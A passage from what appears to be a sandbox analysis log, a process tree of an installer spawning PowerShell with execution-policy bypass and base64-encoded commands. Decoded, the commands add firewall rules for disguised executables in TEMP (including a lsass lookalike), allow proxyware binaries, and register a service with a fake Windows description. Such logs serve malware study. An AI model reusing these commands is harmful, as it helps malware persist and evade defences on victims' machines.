YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAAUwB1AGIAbgBlAHQAdwBvAHIAawAgAEMAbwBuAHQAcgBvAGwAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAAUwB1AGIAbgBlAHQAdwBvAHIAawAgAEMAbwBuAHQAcgBvAGwAIgAgAC0ARwByAG8AdQBwACAAIgBXAGkAbgBkAG8AdwBzACAAUwB1AGIAbgBlAHQAdwBvAHIAawAgAEMAbwBuAHQAcgBvAGwAIgAgAC0AUAByAG8AZwByAGEAbQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAUABQAEQAQQBUAEEAXABMAE8AQwBBAEwAXABUAEUATQBQAFwAUgB1AG4AdABpAG0AZQBCAHIAbwBvAGsAZQByAC4AZQB4AGUAIgAgAC0ARABpAHIAZQBjAHQAaQBvAG4AIABJAG4AYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAQQBuAHkAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQAKAE4AZQB3AC0ATgBlAHQARgBpAHIAZQB3AGEAbABsAFIAdQBsAGUAIAAtAE4AYQBtAGUAIAAiAFcAaQBuAGQAbwB3AHMAIABTAHUAYgBuAGUAdAB3AG8AcgBrACAAQwBvAG4AdAByAG8AbAAgAEMAZQBuAHQAZQByACIAIAAtAEQAaQBzAHAAbABhAHkATgBhAG0AZQAgACIAVwBpAG4AZABvAHcAcwAgAFMAdQBiAG4AZQB0AHcAbwByAGsAIABDAG8AbgB0AHIAbwBsACAAQwBlAG4AdABlAHIAIgAgAC0ARwByAG8AdQBwACAAIgBXAGkAbgBkAG8AdwBzACAAUwB1AGIAbgBlAHQAdwBvAHIAawAgAEMAbwBuAHQAcgBvAGwAIABDAGUAbgB0AGUAcgAiACAALQBQAHIAbwBnAHIAYQBtACAAIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwAQQBQAFAARABBAFQAQQBcAEwATwBDAEEATABcAFQARQBNAFAAXABSAHUAbgB0AGkAbQBlAEIAcgBvAG8AawBlAHIALgBlAHgAZQAiACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAE8AdQB0AGIAbwB1AG4AZAAgAC0AUAByAG8AZgBpAGwAZQAgAEEAbgB5ACAALQBBAGMAdABpAG8AbgAgAEEAbABsAG8AdwAgAC0ARQBuAGEAYgBsAGUAZAAgAFQAcgB1AGUACgAKAE4AZQB3AC0ATgBlAHQARgBpAHIAZQB3AGEAbABsAFIAdQBsAGUAIAAtAE4AYQBtAGUAIAAiAE0AZQBkAGkAYQAgAEMAZQBuAHQAZQByACAARQB4AHQAZQBuAGQAZQByACAALQAgAEgAVABUAFAAIABTAHQAcgBlAGEAbQBpAG4AZwAgACgAVABDAFAAKQAiACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAiAE0AZQBkAGkAYQAgAEMAZQBuAHQAZQByACAARQB4AHQAZQBuAGQAZQByACAALQAgAEgAVABUAFAAIABTAHQAcgBlAGEAbQBpAG4AZwAgACgAVABDAFAAKQAiACAALQBHAHIAbwB1AHAAIAAiAE0AZQBkAGkAYQAgAEMAZQBuAHQAZQByACAARQB4AHQAZQBuAGQAZQByACAALQAgAEgAVABUAFAAIABTAHQAcgBlAGEAbQBpAG4AZwAgACgAVABDAFAAKQAiACAALQBQAHIAbwBnAHIAYQBtACAAIgAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdABcAFQARQBNAFAAXABSAHUAbgB0AGkAbQBlAEIAcgBvAG8AawBlAHIALgBlAHgAZQAiACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAEkAbgBiAG8AdQBuAGQAIAAtAFAAcgBvAGYAaQBsAGUAIABBAG4AeQAgAC0AQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAbgBhAGIAbABlAGQAIABUAHIAdQBlAAoATgBlAHcALQBOAGUAdABGAGkAcgBlAHcAYQBsAGwAUgB1AGwAZQAgAC0ATgBhAG0AZQAgACIATQBlAGQAaQBhACAAQwBlAG4AdABlAHIAIABFAHgAdABlAG4AZABlAHIAIAAtACAASABUAFQAUABTACAAUwB0AHIAZQBhAG0AaQBuAGcAIAAoAFQAQwBQACkAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBNAGUAZABpAGEAIABDAGUAbgB0AGUAcgAgAEUAeAB0AGUAbgBkAGUAcgAgAC0AIABIAFQAVABQAFMAIABTAHQAcgBlAGEAbQBpAG4AZwAgACgAVABDAFAAKQAiACAALQBHAHIAbwB1AHAAIAAiAE0AZQBkAGkAYQAgAEMAZQBuAHQAZQByACAARQB4AHQAZQBuAGQAZQByACAALQAgAEgAVABUAFAAUwAgAFMAdAByAGUAYQBtAGkAbgBnACAAKABUAEMAUAApACIAIAAtAFAAcgBvAGcAcgBhAG0AIAAiACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0AFwAVABFAE0AUABcAFIAdQBuAHQAaQBtAGUAQgByAG8AbwBrAGUAcgAuAGUAeABlACIAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAATwB1AHQAYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAQQBuAHkAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQA=
                                                                              4⤵
                                                                                PID:5696
                                                                                • C:\Windows\system32\chcp.com
                                                                                  "C:\Windows\system32\chcp.com" 1252
                                                                                  5⤵
                                                                                    PID:2352
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss6AB7.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi6AB4.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr6AB5.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr6AB6.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
                                                                                3⤵
                                                                                  PID:2040
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBNAGUAZABpAGEAIABDAGUAbgB0AGUAcgAgAEUAeAB0AGUAbgBkAGUAcgAgAC0AIABIAFQAVABQACAAUwB0AHIAZQBhAG0AaQBuAGcAIAAoAFUARABQACkAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBNAGUAZABpAGEAIABDAGUAbgB0AGUAcgAgAEUAeAB0AGUAbgBkAGUAcgAgAC0AIABIAFQAVABQACAAUwB0AHIAZQBhAG0AaQBuAGcAIAAoAFUARABQACkAIgAgAC0ARwByAG8AdQBwACAAIgBNAGUAZABpAGEAIABDAGUAbgB0AGUAcgAgAEUAeAB0AGUAbgBkAGUAcgAgAC0AIABIAFQAVABQACAAUwB0AHIAZQBhAG0AaQBuAGcAIAAoAFUARABQACkAIgAgAC0AUAByAG8AZwByAGEAbQAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAB0AHIAYQBmAGYAbQBvAG4AZQB0AGkAegBlAHIAXABhAHAAcABcAFQAZQB4AHQAbABuAHAAdQB0AEgAbwBzAHQALgBlAHgAZQAiACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAEkAbgBiAG8AdQBuAGQAIAAtAFAAcgBvAGYAaQBsAGUAIABBAG4AeQAgAC0AQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAbgBhAGIAbABlAGQAIABUAHIAdQBlAAoATgBlAHcALQBOAGUAdABGAGkAcgBlAHcAYQBsAGwAUgB1AGwAZQAgAC0ATgBhAG0AZQAgACIATQBlAGQAaQBhACAAQwBlAG4AdABlAHIAIABFAHgAdABlAG4AZABlAHIAIAAtACAASABUAFQAUABTACAAUwB0AHIAZQBhAG0AaQBuAGcAIAAoAFUARABQACkAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBNAGUAZABpAGEAIABDAGUAbgB0AGUAcgAgAEUAeAB0AGUAbgBkAGUAcgAgAC0AIABIAFQAVABQAFMAIABTAHQAcgBlAGEAbQBpAG4AZwAgACgAVQBEAFAAKQAiACAALQBHAHIAbwB1AHAAIAAiAE0AZQBkAGkAYQAgAEMAZQBuAHQAZQByACAARQB4AHQAZQBuAGQAZQByACAALQAgAEgAVABUAFAAUwAgAFMAdAByAGUAYQBtAGkAbgBnACAAKABVAEQAUAApACIAIAAtAFAAcgBvAGcAcgBhAG0AIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAdAByAGEAZgBmAG0AbwBuAGUAdABpAHoAZQByAFwAYQBwAHAAXABUAGUAeAB0AGwAbgBwAHUAdABIAG8AcwB0AC4AZQB4AGUAIgAgAC0ARABpAHIAZQBjAHQAaQBvAG4AIABPAHUAdABiAG8AdQBuAGQAIAAtAFAAcgBvAGYAaQBsAGUAIABBAG4AeQAgAC0AQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAbgBhAGIAbABlAGQAIABUAHIAdQBlAA==
                                                                                    4⤵
                                                                                      PID:5476
                                                                                      • C:\Windows\SysWOW64\chcp.com
                                                                                        "C:\Windows\system32\chcp.com" 1252
                                                                                        5⤵
                                                                                          PID:428
                                                                                    • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss7933.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi7920.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr7921.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr7922.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
                                                                                      3⤵
                                                                                        PID:2340
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBCAHIAYQB2AGUAIABCAHIAbwB3AHMAZQByACIAIAAtAEQAaQBzAHAAbABhAHkATgBhAG0AZQAgACIAQgByAGEAdgBlACAAQgByAG8AdwBzAGUAcgAiACAALQBHAHIAbwB1AHAAIAAiAEIAcgBhAHYAZQAgAEIAcgBvAHcAcwBlAHIAIgAgAC0AUAByAG8AZwByAGEAbQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAUABQAEQAQQBUAEEAXABMAE8AQwBBAEwAXABUAEUATQBQAFwAVQBzAGUAcgAwADAAQgBFAEIAcgBvAGsAZQByAC4AZQB4AGUAIgAgAC0ARABpAHIAZQBjAHQAaQBvAG4AIABJAG4AYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAQQBuAHkAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQAKAE4AZQB3AC0ATgBlAHQARgBpAHIAZQB3AGEAbABsAFIAdQBsAGUAIAAtAE4AYQBtAGUAIAAiAEIAcgBhAHYAZQAgAEIAcgBvAHcAcwBlAHIAIABFAFUATABBACIAIAAtAEQAaQBzAHAAbABhAHkATgBhAG0AZQAgACIAQgByAGEAdgBlACAAQgByAG8AdwBzAGUAcgAgAEUAVQBMAEEAIgAgAC0ARwByAG8AdQBwACAAIgBCAHIAYQB2AGUAIABCAHIAbwB3AHMAZQByACAARQBVAEwAQQAiACAALQBQAHIAbwBnAHIAYQBtACAAIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwAQQBQAFAARABBAFQAQQBcAEwATwBDAEEATABcAFQARQBNAFAAXABVAHMAZQByADAAMABCAEUAQgByAG8AawBlAHIALgBlAHgAZQAiACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAE8AdQB0AGIAbwB1AG4AZAAgAC0AUAByAG8AZgBpAGwAZQAgAEEAbgB5ACAALQBBAGMAdABpAG8AbgAgAEEAbABsAG8AdwAgAC0ARQBuAGEAYgBsAGUAZAAgAFQAcgB1AGUACgAKAE4AZQB3AC0ATgBlAHQARgBpAHIAZQB3AGEAbABsAFIAdQBsAGUAIAAtAE4AYQBtAGUAIAAiAEIAcgBhAHYAZQAgAEIAcgBvAHcAcwBlAHIAIABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAIABNAG8AZAB1AGwAZQAiACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAiAEIAcgBhAHYAZQAgAEIAcgBvAHcAcwBlAHIAIABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAIABNAG8AZAB1AGwAZQAiACAALQBHAHIAbwB1AHAAIAAiAEIAcgBhAHYAZQAgAEIAcgBvAHcAcwBlAHIAIABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAIABNAG8AZAB1AGwAZQAiACAALQBQAHIAbwBnAHIAYQBtACAAIgAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdABcAFQARQBNAFAAXABVAHMAZQByADAAMABCAEUAQgByAG8AawBlAHIALgBlAHgAZQAiACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAEkAbgBiAG8AdQBuAGQAIAAtAFAAcgBvAGYAaQBsAGUAIABBAG4AeQAgAC0AQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAbgBhAGIAbABlAGQAIABUAHIAdQBlAAoATgBlAHcALQBOAGUAdABGAGkAcgBlAHcAYQBsAGwAUgB1AGwAZQAgAC0ATgBhAG0AZQAgACIAQgByAGEAdgBlACAAQgByAG8AdwBzAGUAcgAgAE0AYQBpAG4AdABlAG4AYQBuAGMAZQAgAEMAZQBuAHQAZQByACIAIAAtAEQAaQBzAHAAbABhAHkATgBhAG0AZQAgACIAQgByAGEAdgBlACAAQgByAG8AdwBzAGUAcgAgAE0AYQBpAG4AdABlAG4AYQBuAGMAZQAgAEMAZQBuAHQAZQByACIAIAAtAEcAcgBvAHUAcAAgACIAQgByAGEAdgBlACAAQgByAG8AdwBzAGUAcgAgAE0AYQBpAG4AdABlAG4AYQBuAGMAZQAgAEMAZQBuAHQAZQByACIAIAAtAFAAcgBvAGcAcgBhAG0AIAAiACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0AFwAVABFAE0AUABcAFUAcwBlAHIAMAAwAEIARQBCAHIAbwBrAGUAcgAuAGUAeABlACIAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAATwB1AHQAYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAQQBuAHkAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQA=
                                                                                          4⤵
                                                                                            PID:528
                                                                                            • C:\Windows\system32\chcp.com
                                                                                              "C:\Windows\system32\chcp.com" 1252
                                                                                              5⤵
                                                                                                PID:4652
                                                                                          • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss7D7E.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi7D6B.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr7D6C.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr7D6D.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
                                                                                            3⤵
                                                                                              PID:3056
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAAQwByAGUAZABlAG4AdABpAGEAbABzACAAUwBlAHIAdgBpAGMAZQAiACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAiAFcAaQBuAGQAbwB3AHMAIABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIABTAGUAcgB2AGkAYwBlACIAIAAtAEcAcgBvAHUAcAAgACIAVwBpAG4AZABvAHcAcwAgAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAFMAZQByAHYAaQBjAGUAIgAgAC0AUAByAG8AZwByAGEAbQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAUABQAEQAQQBUAEEAXABMAE8AQwBBAEwAXABUAEUATQBQAFwASQBzAGEAcwBzAC4AZQB4AGUAIgAgAC0ARABpAHIAZQBjAHQAaQBvAG4AIABJAG4AYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAQQBuAHkAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQAKAE4AZQB3AC0ATgBlAHQARgBpAHIAZQB3AGEAbABsAFIAdQBsAGUAIAAtAE4AYQBtAGUAIAAiAFcAaQBuAGQAbwB3AHMAIABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIABTAGUAcgB2AGkAYwBlACAATQBhAG4AYQBnAGUAcgAiACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAiAFcAaQBuAGQAbwB3AHMAIABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIABTAGUAcgB2AGkAYwBlACAATQBhAG4AYQBnAGUAcgAiACAALQBHAHIAbwB1AHAAIAAiAFcAaQBuAGQAbwB3AHMAIABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIABTAGUAcgB2AGkAYwBlACAATQBhAG4AYQBnAGUAcgAiACAALQBQAHIAbwBnAHIAYQBtACAAIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwAQQBQAFAARABBAFQAQQBcAEwATwBDAEEATABcAFQARQBNAFAAXABJAHMAYQBzAHMALgBlAHgAZQAiACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAE8AdQB0AGIAbwB1AG4AZAAgAC0AUAByAG8AZgBpAGwAZQAgAEEAbgB5ACAALQBBAGMAdABpAG8AbgAgAEEAbABsAG8AdwAgAC0ARQBuAGEAYgBsAGUAZAAgAFQAcgB1AGUACgAKAE4AZQB3AC0ATgBlAHQARgBpAHIAZQB3AGEAbABsAFIAdQBsAGUAIAAtAE4AYQBtAGUAIAAiAFcAaQBuAGQAbwB3AHMAIABNAGUAZABpAGEAIABTAHkAbgBjAGgAcgBvAG4AaQB6AGEAdABpAG8AbgAiACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAiAFcAaQBuAGQAbwB3AHMAIABNAGUAZABpAGEAIABTAHkAbgBjAGgAcgBvAG4AaQB6AGEAdABpAG8AbgAiACAALQBHAHIAbwB1AHAAIAAiAFcAaQBuAGQAbwB3AHMAIABNAGUAZABpAGEAIABTAHkAbgBjAGgAcgBvAG4AaQB6AGEAdABpAG8AbgAiACAALQBQAHIAbwBnAHIAYQBtACAAIgAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdABcAFQARQBNAFAAXABJAHMAYQBzAHMALgBlAHgAZQAiACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAEkAbgBiAG8AdQBuAGQAIAAtAFAAcgBvAGYAaQBsAGUAIABBAG4AeQAgAC0AQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAbgBhAGIAbABlAGQAIABUAHIAdQBlAAoATgBlAHcALQBOAGUAdABGAGkAcgBlAHcAYQBsAGwAUgB1AGwAZQAgAC0ATgBhAG0AZQAgACIAVwBpAG4AZABvAHcAcwAgAE0AZQBkAGkAYQAgAFMAeQBuAGMAaAByAG8AbgBpAHoAYQB0AGkAbwBuACAAUwBlAHIAdgBpAGMAZQAiACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAiAFcAaQBuAGQAbwB3AHMAIABNAGUAZABpAGEAIABTAHkAbgBjAGgAcgBvAG4AaQB6AGEAdABpAG8AbgAgAFMAZQByAHYAaQBjAGUAIgAgAC0ARwByAG8AdQBwACAAIgBXAGkAbgBkAG8AdwBzACAATQBlAGQAaQBhACAAUwB5AG4AYwBoAHIAbwBuAGkAegBhAHQAaQBvAG4AIABTAGUAcgB2AGkAYwBlACIAIAAtAFAAcgBvAGcAcgBhAG0AIAAiACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0AFwAVABFAE0AUABcAEkAcwBhAHMAcwAuAGUAeABlACIAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAATwB1AHQAYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAQQBuAHkAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQAKAAoATgBlAHcALQBOAGUAdABGAGkAcgBlAHcAYQBsAGwAUgB1AGwAZQAgAC0ATgBhAG0AZQAgACIAbQB5AHMAdABfAGwAYQB1AG4AYwBoAGUAcgBfAHQAYwBwACIAIAAtAEQAaQBzAHAAbABhAHkATgBhAG0AZQAgACIAbQB5AHMAdABfAGwAYQB1AG4AYwBoAGUAcgBfAHQAYwBwACIAIAAtAFAAcgBvAGcAcgBhAG0AIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXAAuAG0AeQBzAHQAZQByAGkAdQBtAC0AYgBpAG4AXABtAHkAcwB0AC4AZQB4AGUAIgAgAC0ARABpAHIAZQBjAHQAaQBvAG4AIABJAG4AYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAUAB1AGIAbABpAGMAIAAtAFAAcgBvAHQAbwBjAG8AbAAgAFQAQwBQACAALQBBAGMAdABpAG8AbgAgAEEAbABsAG8AdwAgAC0ARQBuAGEAYgBsAGUAZAAgAFQAcgB1AGUACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBtAHkAcwB0AF8AbABhAHUAbgBjAGgAZQByAF8AdQBkAHAAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBtAHkAcwB0AF8AbABhAHUAbgBjAGgAZQByAF8AdQBkAHAAIgAgAC0AUAByAG8AZwByAGEAbQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAC4AbQB5AHMAdABlAHIAaQB1AG0ALQBiAGkAbgBcAG0AeQBzAHQALgBlAHgAZQAiACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAEkAbgBiAG8AdQBuAGQAIAAtAFAAcgBvAGYAaQBsAGUAIABQAHUAYgBsAGkAYwAgAC0AUAByAG8AdABvAGMAbwBsACAAVQBEAFAAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQA=
                                                                                                4⤵
                                                                                                  PID:4280
                                                                                                  • C:\Windows\system32\chcp.com
                                                                                                    "C:\Windows\system32\chcp.com" 1252
                                                                                                    5⤵
                                                                                                      PID:3408
                                                                                                • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss81E8.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi81D5.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr81D6.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr81D7.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
                                                                                                  3⤵
                                                                                                    PID:1124
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBOAGUAdwAtAFMAZQByAHYAaQBjAGUAIAAtAE4AYQBtAGUAIAAiAFAAcgBvAGcAcgBhAG0AcwBDAGEAYwBoAGUAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBDAGEAYwBoAGUAIABQAHIAbwBnAHIAYQBtACAAQwBvAG4AdAByAG8AbAAiACAALQBEAGUAcwBjAHIAaQBwAHQAaQBvAG4AIAAiAE0AYQBuAGEAZwBlAHMAIABhAG4AZAAgAGkAbQBwAGwAZQBtAGUAbgB0AHMAIABDAGEAYwBoAGUAIABQAHIAbwBnAHIAYQBtACAAQwBvAG4AdAByAG8AbAAgAHUAcwBlAGQAIABmAG8AcgAgAGIAYQBjAGsAdQBwACAAYQBuAGQAIABvAHQAaABlAHIAIABwAHUAcgBwAG8AcwBlAHMALgAgAEkAZgAgAHQAaABpAHMAIABzAGUAcgB2AGkAYwBlACAAaQBzACAAcwB0AG8AcABwAGUAZAAsACAAcwBoAGEAZABvAHcAIABjAG8AcABpAGUAcwAgAHcAaQBsAGwAIABiAGUAIAB1AG4AYQB2AGEAaQBsAGEAYgBsAGUAI